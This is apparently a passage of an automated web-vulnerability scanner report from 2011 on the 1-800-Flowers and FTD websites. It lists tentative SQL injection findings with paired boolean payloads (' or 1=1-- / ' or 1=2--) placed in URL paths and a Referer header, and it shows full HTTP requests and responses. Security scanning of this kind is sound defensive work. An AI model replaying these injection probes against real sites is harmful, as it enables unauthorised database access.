<style type="text/css">/* common.css */.trsHeader {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repea
...[SNIP]...

Request 2

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:30 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: 18FBannerCode=seogoogle; Expires=Wed, 11-May-11 01:16:30 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826























<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Sign In - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://www.1800flowers.com/checkoutsignin.do" />

<link rel="shortcut icon" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/n-checkout_oct.css"/>

<style type="text/css">/* common.css */.trsHeader {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top
...[SNIP]...
1.7. http://www.ftd.com/350/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21285651'%20or%201%3d1--%20 and 21285651'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35021285651'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:03:44 GMT
X-Varnish: 540322091
Age: 12
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540322091</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35021285651'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=2FD5010279D810790011F758B4F4C273; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=2FD5010279D810790011F758B4F4C273; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:03:44 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:03:45 GMT
X-Varnish: 750145506
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...
1.8. http://www.ftd.com/350/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15879274'%20or%201%3d1--%20 and 15879274'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/favicon.ico15879274'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:05:27 GMT
X-Varnish: 869422801
Age: 12
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869422801</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/favicon.ico15879274'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=6D8C53EC79D810790014BFC3CFF4C69A; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=6D8C53EC79D810790014BFC3CFF4C69A; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:05:27 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:05:28 GMT
X-Varnish: 1301387315
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       
...[SNIP]...
1.9. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 83538669'%20or%201%3d1--%20 and 83538669'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35083538669'%20or%201%3d1--%20/v20110407/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:04:56 GMT
X-Varnish: 869420999
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869420999</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35083538669'%20or%201%3d2--%20/v20110407/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=5AFF297079D8107900098B649F286376; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=5AFF297079D8107900098B649F286376; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:04:56 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:04:57 GMT
X-Varnish: 729980488
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...
1.10. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17090585'%20or%201%3d1--%20 and 17090585'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/v2011040717090585'%20or%201%3d1--%20/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:47 GMT
X-Varnish: 750156685
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750156685</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/v2011040717090585'%20or%201%3d2--%20/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=9D1A98E479D8107900078E669A912BE0; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9D1A98E479D8107900078E669A912BE0; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:06:47 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:06:48 GMT
X-Varnish: 729987039
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...
1.11. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14836871'%20or%201%3d1--%20 and 14836871'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/v20110407/ftd.css14836871'%20or%201%3d1--%20?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:57 GMT
X-Varnish: 540338955
Age: 22
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540338955</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/v20110407/ftd.css14836871'%20or%201%3d2--%20?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=EA3EF0E879D810790009D4C6C7EFA5CB; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=EA3EF0E879D810790009D4C6C7EFA5CB; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:08:57 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:08:57 GMT
X-Varnish: 540340109
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...
1.12. http://www.ftd.com/351 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12984083'%20or%201%3d1--%20 and 12984083'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35112984083'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Mon, 09 May 2011 01:08:23 GMT
X-Varnish: 1301397318
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1301397318</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35112984083'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=D65CB5CE79D810790002C0244811241D; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=D65CB5CE79D810790002C0244811241D; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:08:23 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123161
Date: Mon, 09 May 2011 01:08:25 GMT
X-Varnish: 750163468
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

